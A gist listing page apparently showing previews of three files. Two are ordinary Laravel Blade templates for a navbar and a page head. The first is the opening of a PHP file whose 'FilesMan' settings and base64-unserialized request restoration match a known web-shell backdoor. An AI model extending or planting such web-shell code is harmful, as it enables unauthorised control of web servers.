This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$color = "#df5"; | |
$default_action = 'FilesMan'; | |
$default_use_ajax = true; | |
$default_charset = 'Windows-1251'; | |
if($argc == 3) { | |
$_POST = unserialize(base64_decode($argv[1])); | |
$_SERVER = unserialize(base64_decode($argv[2])); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Main navigation begin --> | |
<nav class="uk-navbar-container uk-visible@m" data-uk-navbar style="z-index: 980;" data-uk-sticky="animation: uk-animation-slide-top; cls-active: uk-sticky; cls-inactive: uk-navbar-container; bottom: #offset"> | |
<div class="uk-navbar-left"> | |
<ul class="uk-navbar-nav"> | |
<li class="{{ is_active('/') }}"> | |
<a href="index.html">Home</a> | |
</li> | |
<li> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<!-- Standard Meta --> | |
<meta charset="utf-8"> | |
<meta name="format-detection" content="telephone=no" /> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
<!-- Site Properties --> | |
<title>@yield('title','Home') | {{ config('app.name', 'Laravel') }}</title> | |
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"> |
NewerOlder